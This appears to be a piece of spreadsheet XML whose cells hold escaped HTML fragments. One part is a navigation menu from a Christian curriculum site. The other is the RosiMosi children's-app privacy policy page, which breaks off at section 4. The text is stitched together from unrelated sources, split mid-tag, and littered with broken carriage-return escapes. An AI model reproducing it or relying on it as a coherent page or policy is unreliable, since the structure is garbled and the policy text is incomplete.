				&lt;div class="back"&gt;&lt;span class="icon-arrow-left"&gt;&lt;/span&gt;Back&lt;/div&gt;
				&lt;span class="text"&gt;
						&lt;a href=https://www.truth78.org/fighter-verses							class="level1  last"
							target=_self role="menuitem"&gt;
							Bible Memory						&lt;/a&gt;
					&lt;/span&gt;
					 &lt;ul class="nav-children"&gt;
						    &lt;li class="level2   first"&gt;
        &lt;a href=https://www.truth78.org/fighter-verses class="level2  first" target=_self role="menuitem"&gt;
            &lt;span&gt;Fighter Verses Overview&lt;/span&gt;
        &lt;/a&gt;
            </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/li&gt;
    &lt;li class="level2 "&gt;
        &lt;a href=https://www.truth78.org/memorization-tools class="level2 " target=_self role="menuitem"&gt;
            &lt;span&gt;Tools for Memorizing&lt;/span&gt;
        &lt;/a&gt;
            &lt;/li&gt;
    &lt;li class="level2 "&gt;
        &lt;a href=https://www.truth78.org/bible-memory-with-children class="level2 " target=_self role="menuitem"&gt;
            &lt;span&gt;Bible Memory With Children&lt;/span&gt;
        &lt;/a&gt;
            &lt;/li&gt;
    &lt;li class="level2 "&gt;
        &lt;a href=https://www.truth78.org/bible-memory-in-church class="level2 " target=_self role="menuitem"&gt;
            &lt;span&gt;Bible Memory in the Church&lt;/span&gt;
        &lt;/a&gt;
            &lt;/li&gt;
    &lt;li class="level2  last"&gt;
        &lt;a href=https://www.truth78.org/fv-app class="level2  last" target=_self role="menuitem"&gt;
            &lt;span&gt;Fighter Verses App&lt;/span&gt;
        &lt;/a&gt;
            &lt;/li&gt;
					&lt;/ul&gt;
				&lt;/div&gt;
			&lt;/div&gt;
            &lt;/li&gt;
			            &lt;/ul&gt;
					&lt;/div&gt;
			&lt;/div&gt;
        &lt;/li&gt;
    &lt;li class="level0 mega-nav level-top"&gt;
        &lt;a href=https://www.truth78.org/products class="level0 mega-nav level-top" target=_self role="menuitem"&gt;
            &lt;span&gt;Products&lt;/span&gt;
        &lt;/a&gt;
        			&lt;div class="drop-down js-drop-down"&gt;
				&lt;div class="menu-wrap"&gt;
				&lt;div class="back"&gt;&lt;span class="icon-arrow-left"&gt;&lt;/span&gt;Back&lt;/div&gt;
				&lt;span class="text"&gt;
						&lt;a href=https://www.truth78.org/products							class="level0 mega-nav level-top"
							target=_self role="menuitem"&gt;
							Products						&lt;/a&gt;
					 &lt;/span&gt;
					&lt;ul class="nav-children"&gt;
						    &lt;li class="level1  first"&gt;
        &lt;a href=https://www.truth78.org/products class="level1  first" target=_self role="menuitem"&gt;
            &lt;span&gt;By Category&lt;/span&gt;
        &lt;/a&gt;
        			&lt;div class="drop-down js-drop-down"&gt;
				&lt;div class="menu-wrap"&gt;
				&lt;div class="back"&gt;&lt;span class="icon-arrow-left"&gt;&lt;/span&gt;Back&lt;/div&gt;
				&lt;span class="text"&gt;
						&lt;a href=https://www.truth78.org/products							class="level1  first"
							target=_self role="menuitem"&gt;
							By Category						&lt;/a&gt;
					&lt;/span&gt;
					&lt;ul class="nav-children"&gt;
						    &lt;li class="level2 "&gt;
        &lt;a href=https://www.truth78.org/products/sunday-school-curriculum class="level2 " target=_self role="menuitem"&gt;
            &lt;span&gt;Sunday School Curriculum&lt;/span&gt;
        &lt;/a&gt;
            &lt;/li&gt;
    &lt;li class="level2 "&gt;
        &lt;a href=https://www.truth78.org/products/youth-curriculum class="level2 " target=_self role="menuitem"&gt;
            &lt;span&gt;Youth Curriculum&lt;/span&gt;
        &lt;/a&gt;
            &lt;/li&gt;
    &lt;li class="level2 "&gt;
        &lt;a href=https://www.truth78.org/products/midweek-bible-curriculum class="level2 " target=_self role="menuitem"&gt;
            &lt;span&gt;Midweek Bible Curriculum&lt;/span&gt;
        &lt;/a&gt;
            &lt;/li&gt;
    &lt;li class="level2 "&gt;
        &lt;a href=https://www.truth78.org/products/intergenerational-curriculum class="level2 " target=_self role="menuitem"&gt;
            &lt;span&gt;Intergenerational Curriculum&lt;/span&gt;
        &lt;/a&gt;
            &lt;/li&gt;
    &lt;li class="level2 "&gt;
        &lt;a href=https://www.truth78.org/products/backyard-bible-club-vbs class="level2 " target=_self role="menuitem"&gt;
            &lt;span&gt;Backyard Bible Club / VBS&lt;/span&gt;
        &lt;/a&gt;
            &lt;/li&gt;
    &lt;li class="level2 "&gt;
        &lt;a href=https://www.truth78.org/products/fighter-verses class="level2 " target=_self role="menuitem"&gt;
            &lt;span&gt;Fighter Verses&lt;/span&gt;
        &lt;/a&gt;
            &lt;/li&gt;
    &lt;li class="level2 "&gt;
        &lt;a href=https://www.truth78.org/products/booklets class="level2 " target=_self role="menuitem"&gt;
            &lt;span&gt;Books &amp;amp; Booklets&lt;/span&gt;
        &lt;/a&gt;
             &lt;/li&gt;
    &lt;li class="level2 "&gt;
        &lt;a href=https://www.truth78.org/products/family-devotions class="level2 " target=_self role="menuitem"&gt;
            &lt;span&gt;Family Devotions&lt;/span&gt;
        &lt;/a&gt;
            </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/li&gt;
    &lt;li class="level2 "&gt;
        &lt;a href=https://www.truth78.org/products/childrens-books class="level2 " target=_self role="menuitem"&gt;
            &lt;span&gt;Children's Books&lt;/span&gt;
        &lt;/a&gt;
            &lt;/li&gt;
    &lt;li class="level2 "&gt;
        &lt;a href=https://www.truth78.org/products/coloring-books class="level2 " target=_self role="menuitem"&gt;
            &lt;span&gt; Coloring Books&lt;/span&gt;
        &lt;/a&gt;
             &lt;/li&gt;
    &lt;li class="level2 "&gt;
        &lt;a href=https://www.truth78.org/free-resources class="level2 " target=_self role="menuitem"&gt;
            &lt;span&gt;Free Resources&lt;/span&gt;
        &lt;/a&gt;
            &lt;/li&gt;
    &lt;li class="level2  last"&gt;
        &lt;a href=https://www.truth78.org/apps-for-families class="level2  last" target=_self role="menuitem"&gt;
            &lt;span&gt;Apps&lt;/span&gt;
        &lt;/a&gt;
          </t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;_x005F_x000D_
&lt;html lang="en"&gt;_x005F_x000D_
  &lt;head&gt;_x005F_x000D_
    &lt;meta charset="utf-8" /&gt;_x005F_x000D_
    &lt;meta name="viewport" content="width=device-width, initial-scale=1" /&gt;_x005F_x000D_
_ x000D_
       &lt;title&gt;RosiMosi&lt;/title&gt;_x005F_x000D_
_x005F_x000D_
    &lt;link rel="preconnect" href="https://fonts.gstatic.com" /&gt;_x005F_x000D_
    &lt;</t>
  </si>
  <si>
    <t>link_x005F_x000D_
      href="https://fonts.googleapis.com/css2?family=Nunito:wght@400;700;800;900&amp;display=swap"_x005F_x000D_
      rel="stylesheet"_x005F_x000D_
    /&gt;_x005F_x000D_
_x005F_x000D_
    &lt;!-- Favicons --&gt;_x005F_x000D_
    &lt;link rel="shortcut icon" href="/images/favicon.ico" /&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
    &lt;!-- Bootstrap core CSS --&gt;_x005F_x000D_
    &lt;link href="/assets/dist/css/bootstrap.min.css" rel="stylesheet" /&gt;   _x005F_x000D_
_x005F_x000D_
_x005F_x000D_
    &lt;!--</t>
  </si>
  <si>
    <t xml:space="preserve">Custom styles for this template --&gt;_x005F_x000D_
    &lt;link href="/css/style_gw.css" rel="stylesheet" /&gt;_x005F_x000D_
_x005F_x000D_
    &lt;!-- Animation styles --&gt;_x005F_x000D_
    &lt;link href="/css/animate.min.css" rel="stylesheet" /&gt;_x005F_x000D_
_x005F_x000D_
    &lt;!-- Global site tag (gtag.js) - Google Analytics _x005F_x000D_
    </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;script_x005F_x000D_
      async_x005F_x000D_
      src="https://www.googletagmanager.com/gtag/js?id=G-EY8G4F3Q9T"_x005F_x000D_
    &gt;&lt;/script&gt;_x005F_x000D_
    &lt;script&gt;_x005F_x000D_
      window.dataLayer = window.dataLayer || [];_x005F_x000D_
      function gtag() {_x005F_x000D_
        </t>
  </si>
  <si>
    <t>dataLayer.push(arguments);_x005F_x000D_
      }_x005F_x000D_
      gtag("js", new Date());_x005F_x000D_
_x005F_x000D_
      gtag("config", "G-EY8G4F3Q9T");_x005F_x000D_
    &lt;/script&gt;_x005F_x000D_
    --&gt;_x005F_x000D_
    _x005F_x000D_
  &lt;/head&gt;_x005F_x000D_
_x005F_x000D_
  _x005F_x000D_
    &lt;body class="login"&gt;_x005F_x000D_
  _x005F_x000D_
    &lt;div class="home-container container-one"&gt;_x005F_x000D_
      &lt;header&gt;_x005F_x000D_
_x005F_x000D_
       &lt;/header&gt;_x005F_x000D_
_x005F_x000D_
      &lt;!-- //Header --&gt;_x005F_x000D_
      &lt;div class="container"&gt;_x005F_x000D_
         _x005F_x000D_
      &lt;/div&gt;      &lt;div class="content-row academy-row"&gt;_x005F_x000D_
  &lt;div class="white-box" style="margin: auto; text-align: center"&gt;_x005F_x000D_
    &lt;h2&gt;</t>
  </si>
  <si>
    <t>RosiMosi Privacy Policy &amp; Terms of Service&lt;/h2&gt;_x005F_x000D_
_x005F_x000D_
    &lt;div class="container justify-content-center" id="app"&gt;_x005F_x000D_
      &lt;br/&gt;&lt;br/&gt;_x005F_x000D_
      &lt;div class="section-divider black-divider"&gt;&lt;/div&gt;_x005F_x000D_
      &lt;br/&gt;&lt;br/&gt;_x005F_x000D_
      &lt;h2 class="text-center"&gt;Mobile App Privacy Policy&lt;/h2&gt;_x005F_x000D_
       &lt;p class="text-left"&gt;_x005F_x000D_
        Effective November 15th 2012&lt;br /&gt;_x005F_x000D_
        Updated November 14th 2022_x005F_x000D_
        &lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
         Protecting your privacy and data is very important to us. Accordingly,_x005F_x000D_
        we have developed this Privacy and Data Policy in order for you to_x005F_x000D_
        understand what data we collect and how we use it.</t>
  </si>
  <si>
    <t>The following_x005F_x000D_
        outlines our policy for all of our mobile apps downloaded from stores_x005F_x000D_
        such as Apple, Google, and Amazon. This policy excludes The Guides_x005F_x000D_
        series. The privacy policy for those apps may be found at:_x005F_x000D_
        https://theguidesapp.com/privacy_x005F_x000D_
        &lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
        Please note if you sign-up for a subscription to the RosiMosi Academy_x005F_x000D_
        then the_x005F_x000D_
        &lt;a href="/privacy#academy"&gt;RosiMosi Academy Privacy Policy&lt;/a&gt;_x005F_x000D_
        will also apply. &lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
        • &lt;b&gt;Personal Information:&lt;/b&gt; By default our mobile apps collect no_x005F_x000D_
        personally identifiable information.</t>
  </si>
  <si>
    <t>If you sign-up for the RosiMosi_x005F_x000D_
        Academy we may collect information such as your name and email address._x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        • &lt;b&gt;Data Collection:&lt;/b&gt; Our apps may collect anonymous usage_x005F_x000D_
        information to help improve the quality of our services and_x005F_x000D_
        applications.</t>
  </si>
  <si>
    <t xml:space="preserve">This data is anonymous and does not contain any_x005F_x000D_
        information which may be used to identify a specific user.&lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        </t>
  </si>
  <si>
    <t>If you subscribe to the RosiMosi Academy, more data collection may_x005F_x000D_
        occur. View the_x005F_x000D_
         &lt;a href="/privacy#academy"&gt;RosiMosi Academy Privacy Policy&lt;/a&gt; for more_x005F_x000D_
        details.</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        All of our apps are built with the Solar SDK. Solar SDK may collect_x005F_x000D_
        anonymous usage information that is fully GDPR compliant.</t>
  </si>
  <si>
    <t>This means it_x005F_x000D_
        does not collect any Personal Data which can be used to identify a_x005F_x000D_
        specific user. View the full Privacy Policy for Solar SDK here:_x005F_x000D_
        https://coronalabs.com/privacy-policy-for-app-users/_x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        • &lt;b&gt;Data Retention:&lt;/b&gt;</t>
  </si>
  <si>
    <t>We will only keep your personal information for_x005F_x000D_
        as long as it is necessary for the purposes set out in this privacy_x005F_x000D_
        policy, unless a longer retention period is required or permitted by law_x005F_x000D_
        (such as tax, accounting or other legal requirements). No purpose in_x005F_x000D_
        this policy will require us keeping your personal information for longer_x005F_x000D_
        than 2 years past the termination of the user's account . If you wish to_x005F_x000D_
        remove any of your information from our systems please contact us at_x005F_x000D_
        help@rosimosi.com.</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        • &lt;b&gt;Age Limitations:&lt;/b&gt;</t>
  </si>
  <si>
    <t>We do not knowingly contact or do business_x005F_x000D_
        with anyone under 16 years of age. If a parent or guardian becomes aware_x005F_x000D_
        that a child under the age of 16 has attempted to contact and/or do_x005F_x000D_
        business with us, please advise us by email at help@rosimosi.com so that_x005F_x000D_
        we may rectify the situation.</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        • &lt;b&gt;Push Notifications:&lt;/b&gt;</t>
  </si>
  <si>
    <t>We may also send parents and teachers_x005F_x000D_
        practice reminders through our mobile apps. These notifications are_x005F_x000D_
        intended for grownups only and can only be requested through the_x005F_x000D_
        parent/grownup sections of our mobile apps. You can opt-out from these_x005F_x000D_
        notifications or modify the frequency of these notifications at any time_x005F_x000D_
        through the app or device settings.</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        • &lt;b&gt;Social Media:&lt;/b&gt;</t>
  </si>
  <si>
    <t>Our apps do not interact with any social media_x005F_x000D_
        networks. We may provide links to our own social media networks for the_x005F_x000D_
        purpose of providing support and product information. &lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
         This policy is extremely restrictive in order to protect children while_x005F_x000D_
        using apps. Our philosophy is that children should not be exposed to_x005F_x000D_
        dangers while playing games and parents shouldn't have to worry if an_x005F_x000D_
        app is collecting information about them.</t>
  </si>
  <si>
    <t>If you ever have a question_x005F_x000D_
        about the privacy of your children, or yourself, while using our_x005F_x000D_
        applications, please email us at help@rosimosi.com_x005F_x000D_
      &lt;/p&gt;_x005F_x000D_
    &lt;/div&gt;_x005F_x000D_
    &lt;br/&gt;&lt;br/&gt;_x005F_x000D_
    &lt;div class="section-divider black-divider"&gt;&lt;/div&gt;_x005F_x000D_
    &lt;br/&gt;&lt;br/&gt;_x005F_x000D_
    &lt;div class="container justify-content-center text-center" id="academy"&gt;_x005F_x000D_
      &lt;h2 class="text-center"&gt;RosiMosi Academy Privacy Policy&lt;/h2&gt;_x005F_x000D_
      &lt;p class="text-left"&gt;_x005F_x000D_
        Effective December 12th 2019&lt;br /&gt;_x005F_x000D_
        Updated February 10th 2021_x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        Thank you for choosing to be part of our community at RosiMosi LLC_x005F_x000D_
        (“Company”, “we”, “us”, or “our”). We are committed to protecting your_x005F_x000D_
        personal information and your right to privacy.</t>
  </si>
  <si>
    <t>If you have any_x005F_x000D_
        questions or concerns about our policy, or our practices with regards to_x005F_x000D_
        your personal information, please contact us at help@rosimosi.com._x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
         When you visit our website www.rosimosi.com, and use our services, you_x005F_x000D_
        trust us with your personal information.</t>
  </si>
  <si>
    <t>We take your privacy very_x005F_x000D_
        seriously. In this privacy policy, we seek to explain to you in the_x005F_x000D_
        clearest way possible what information we collect, how we use it and_x005F_x000D_
        what rights you have in relation to it. We hope you take some time to_x005F_x000D_
        read through it carefully, as it is important.</t>
  </si>
  <si>
    <t>If there are any terms in_x005F_x000D_
        this privacy policy that you do not agree with, please discontinue use_x005F_x000D_
        of our Sites and our services._x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
         This privacy policy applies to all information collected through our_x005F_x000D_
        website (such as www.rosimosi.com), and/or any related services, sales,_x005F_x000D_
        marketing or events (we refer to them collectively in this privacy_x005F_x000D_
        policy as the "Services")._x005F_x000D_
        &lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
        Please read this privacy policy carefully as it will help you make_x005F_x000D_
        informed decisions about sharing your personal information with us._x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        &lt;b&gt;1. WHAT INFORMATION DO WE COLLECT?</t>
  </si>
  <si>
    <t>&lt;/b&gt;_x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
         Personal information you disclose to us_x005F_x000D_
        &lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t xml:space="preserve">/&gt;_x005F_x000D_
        &lt;em_x005F_x000D_
          &gt; In Short: We collect personal information that you provide to us such_x005F_x000D_
          as name, address, contact information, passwords and security data,_x005F_x000D_
          payment information, and social media login data.&lt;/em_x005F_x000D_
        &gt;_x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        </t>
  </si>
  <si>
    <t>We collect personal information that you voluntarily provide to us when_x005F_x000D_
        registering at the Services expressing an interest in obtaining_x005F_x000D_
        information about us or our products and services, when participating in_x005F_x000D_
        activities on the Services or otherwise contacting us._x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
         The personal information that we collect depends on the context of your_x005F_x000D_
        interactions with us and the Services, the choices you make and the_x005F_x000D_
        products and features you use.</t>
  </si>
  <si>
    <t>The personal information we collect can_x005F_x000D_
        include the following:_x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        &lt;b&gt; Publicly Available Personal Information.&lt;/b&gt;</t>
  </si>
  <si>
    <t>We collect first name,_x005F_x000D_
        maiden name, last name, nickname, ID, email addresses, and other similar_x005F_x000D_
        data. &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
_x005F_x000D_
        &lt;b&gt;Credentials.&lt;/b&gt;</t>
  </si>
  <si>
    <t>We collect passwords, password hints, and similar_x005F_x000D_
        security information used for authentication and account access._x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
_x005F_x000D_
        &lt;b&gt;Student Data.&lt;/b&gt; We collect student names and track program usage_x005F_x000D_
        for parent/teacher reporting.</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;_x005F_x000D_
_x005F_x000D_
        &lt;b &gt;Payment Data.&lt;/b&gt;</t>
  </si>
  <si>
    <t>We collect data necessary to process your payment_x005F_x000D_
        if you make purchases, such as your payment instrument number (such as a_x005F_x000D_
        credit card number), and the security code associated with your payment_x005F_x000D_
        instrument. All payment data is stored by Stripe. You may find their_x005F_x000D_
        privacy policy link(s) here: www.stripe.com.</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        &lt;b&gt;Social Media Login Data.&lt;/b&gt; We provide you with the option to_x005F_x000D_
        register using social media account details, like your Facebook, Twitter_x005F_x000D_
        or other social media account.</t>
  </si>
  <si>
    <t xml:space="preserve">If you choose to register in this way, we_x005F_x000D_
        will collect the Information described in the section called "HOW DO WE_x005F_x000D_
        HANDLE YOUR SOCIAL LOGINS " below. &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        </t>
  </si>
  <si>
    <t>All personal information that you provide to us must be true, complete_x005F_x000D_
        and accurate, and you must notify us of any changes to such personal_x005F_x000D_
        information._x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        &lt;b&gt;Information automatically collected&lt;/b&gt;_x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        &lt;em_x005F_x000D_
          &gt;</t>
  </si>
  <si>
    <t>In Short: Some information – such as IP address and/or browser and_x005F_x000D_
          device characteristics – is collected automatically when you visit our_x005F_x000D_
          Services.&lt;/em_x005F_x000D_
        &gt;_x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
         We automatically collect certain information when you visit, use or_x005F_x000D_
        navigate the Services.</t>
  </si>
  <si>
    <t>This information does not reveal your specific_x005F_x000D_
        identity (like your name or contact information) but may include device_x005F_x000D_
        and usage information, such as your IP address, browser and device_x005F_x000D_
        characteristics, operating system, language preferences, referring URLs,_x005F_x000D_
        device name, country, location, information about how and when you use_x005F_x000D_
        our Services and other technical information. This information is_x005F_x000D_
        primarily needed to maintain the security and operation of our Services,_x005F_x000D_
        and for our internal analytics and reporting purposes._x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        Like many businesses, we also collect information through cookies and_x005F_x000D_
        similar technologies._x005F_x000D_
        &lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
        &lt;b&gt;Online Identifiers.&lt;/b&gt; We collect tools and protocols, such as IP_x005F_x000D_
        (Internet Protocol) addresses, devices, cookie identifiers, or others_x005F_x000D_
        such as the ones used for analytics and marketing, and other similar_x005F_x000D_
        data. &lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
_x005F_x000D_
        &lt;b&gt;2. HOW DO WE USE YOUR INFORMATION?&lt;/b&gt;_x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        &lt;em_x005F_x000D_
          &gt;</t>
  </si>
  <si>
    <t xml:space="preserve">In Short: We process your information for purposes based on_x005F_x000D_
          legitimate business interests, the fulfillment of our contract with_x005F_x000D_
           you, compliance with our legal obligations, and/or your consent.&lt;/em_x005F_x000D_
        &gt;_x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        </t>
  </si>
  <si>
    <t>We use personal information collected via our Services for a variety of_x005F_x000D_
        business purposes described below. We process your personal information_x005F_x000D_
        for these purposes in reliance on our legitimate business interests, in_x005F_x000D_
        order to enter into or perform a contract with you, with your consent,_x005F_x000D_
        and/or for compliance with our legal obligations. We indicate the_x005F_x000D_
        specific processing grounds we rely on next to each purpose listed_x005F_x000D_
        below._x005F_x000D_
        &lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
_x005F_x000D_
        We use the information we collect or receive:_x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        - To facilitate account creation and logon process. If you choose to_x005F_x000D_
        link your account with us to a third party account (such as your Google_x005F_x000D_
        or Facebook account), we use the information you allowed us to collect_x005F_x000D_
        from those third parties to facilitate account creation and logon_x005F_x000D_
        process for the performance of the contract.</t>
  </si>
  <si>
    <t>See the section below_x005F_x000D_
        headed " HOW DO WE HANDLE YOUR SOCIAL LOGINS " for further information._x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        - To send you marketing and promotional communications. We and/or our_x005F_x000D_
        third party marketing partners may use the personal information you send_x005F_x000D_
        to us for our marketing purposes, if this is in accordance with your_x005F_x000D_
        marketing preferences.</t>
  </si>
  <si>
    <t>You can opt-out of our marketing emails at any_x005F_x000D_
        time (see the " WHAT ARE YOUR PRIVACY RIGHTS " below)._x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        - Fulfill and manage your orders. We may use your information to fulfill_x005F_x000D_
        and manage your orders, payments, returns, and exchanges made through_x005F_x000D_
        the Services._x005F_x000D_
        &lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
        - To protect our Services. We may use your information as part of our_x005F_x000D_
        efforts to keep our Services safe and secure (for example, for fraud_x005F_x000D_
        monitoring and prevention)._x005F_x000D_
        &lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
        - To enforce our terms, conditions and policies for Business Purposes,_x005F_x000D_
        Legal Reasons and Contractual._x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        - To respond to legal requests and prevent harm. If we receive a_x005F_x000D_
        subpoena or other legal request, we may need to inspect the data we hold_x005F_x000D_
        to determine how to respond._x005F_x000D_
        &lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
        - To manage user accounts. We may use your information for the purposes_x005F_x000D_
        of managing our account and keeping it in working order._x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        - To deliver services to the user.</t>
  </si>
  <si>
    <t>We may use your information to_x005F_x000D_
        provide you with the requested service._x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        - To respond to user inquiries/offer support to users. We may use your_x005F_x000D_
        information to respond to your inquiries and solve any potential issues_x005F_x000D_
        you might have with the use of our Services._x005F_x000D_
        &lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
        - For other Business Purposes. We may use your information for other_x005F_x000D_
        Business Purposes, such as data analysis, identifying usage trends,_x005F_x000D_
        determining the effectiveness of our promotional campaigns and to_x005F_x000D_
        evaluate and improve our Services, products, marketing and your_x005F_x000D_
        experience. We may use and store this information in aggregated and_x005F_x000D_
        anonymized form so that it is not associated with individual end users_x005F_x000D_
        and does not include personal information.</t>
  </si>
  <si>
    <t>We will not use identifiable_x005F_x000D_
        personal information without your consent._x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
_x005F_x000D_
        &lt;b&gt;3. WILL YOUR INFORMATION BE SHARED WITH ANYONE?&lt;/b&gt;_x005F_x000D_
        &lt;br</t>
  </si>
  <si>
    <t>/&gt;&lt;br /&gt;_x005F_x000D_
        &lt;em&gt;_x005F_x000D_
          Short: We only share information with your consent, to comply with_x005F_x000D_
          laws, to provide you with services, to protect your rights, or to_x005F_x000D_
          fulfill business obligations.&lt;/em_x005F_x000D_
        &gt;_x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
_x005F_x000D_
        We may process or share data based on the following legal basis:_x005F_x000D_
        &lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t xml:space="preserve">/&gt;_x005F_x000D_
        - Consent: We may process your data if you have given us specific_x005F_x000D_
        consent to use your personal information in a specific purpose._x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        - Legitimate Interests: We may process your data when it is reasonably_x005F_x000D_
        necessary to achieve our legitimate business interests._x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        - Performance of a Contract: Where we have entered into a contract with_x005F_x000D_
        </t>
  </si>
  <si>
    <t>you, we may process your personal information to fulfill the terms of_x005F_x000D_
        our contract._x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        - Legal Obligations: We may disclose your information where we are_x005F_x000D_
        legally required to do so in order to comply with applicable law,_x005F_x000D_
        governmental requests, a judicial proceeding, court order, or legal_x005F_x000D_
        process, such as in response to a court order or a subpoena (including_x005F_x000D_
        in response to public authorities to meet national security or law_x005F_x000D_
        enforcement requirements)._x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        - Vital Interests: We may disclose your information where we believe it_x005F_x000D_
        is necessary to investigate, prevent, or take action regarding potential_x005F_x000D_
        violations of our policies, suspected fraud, situations involving_x005F_x000D_
        potential threats to the safety of any person and illegal activities, or_x005F_x000D_
        as evidence in litigation in which we are involved.</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;More_x005F_x000D_
         specifically, we may need to process your data or share your personal_x005F_x000D_
        information in the following situations: &lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
        - Vendors, Consultants and Other Third-Party Service Providers. We may_x005F_x000D_
        share your data with third party vendors, service providers, contractors_x005F_x000D_
        or agents who perform services for us or on our behalf and require_x005F_x000D_
        access to such information to do that work. Examples include: payment_x005F_x000D_
        processing, data analysis, email delivery, hosting services, customer_x005F_x000D_
        service and marketing efforts.</t>
  </si>
  <si>
    <t>We may allow selected third parties to_x005F_x000D_
        use tracking technology on the Services, which will enable them to_x005F_x000D_
        collect data about how you interact with the Services over time. This_x005F_x000D_
        information may be used to, among other things, analyze and track data,_x005F_x000D_
        determine the popularity of certain content and better understand online_x005F_x000D_
        activity. Unless described in this Policy, we do not share, sell, rent_x005F_x000D_
        or trade any of your information with third parties for their_x005F_x000D_
        promotional purposes.</t>
  </si>
  <si>
    <t>We have contracts in place with our data_x005F_x000D_
        processors. This means that they cannot do anything with your personal_x005F_x000D_
        information unless we have instructed them to do it. They will not share_x005F_x000D_
        your personal information with any organisation apart from us.</t>
  </si>
  <si>
    <t>They will_x005F_x000D_
        hold it securely and retain it for the period we instruct._x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        -Business Transfers. We may share or transfer your information in_x005F_x000D_
        connection with, or during negotiations of, any merger, sale of company_x005F_x000D_
        assets, financing, or acquisition of all or a portion of our business to_x005F_x000D_
        another company._x005F_x000D_
        &lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
        -Affiliates. We may share your information with our affiliates, in which_x005F_x000D_
        case we will require those affiliates to honor this privacy policy ._x000D _
        Affiliates include our parent company and any subsidiaries, joint_x005F_x000D_
        venture partners or other companies that we control or that are under_x005F_x000D_
        common control with us._x005F_x000D_
        &lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
        -Business Partners. We may share your information with our business_x005F_x000D_
        partners to offer you certain products, services or promotions._x005F_x000D_
        &lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
        &lt;b&gt;4. WHO WILL YOUR INFORMATION BE SHARED WITH?&lt;/b&gt;_x005F_x000D_
        &lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t xml:space="preserve">/&gt;_x005F_x000D_
        &lt;em_x005F_x000D_
          &gt; In Short: We only share information with the following third_x005F_x000D_
          parties.&lt;/em_x005F_x000D_
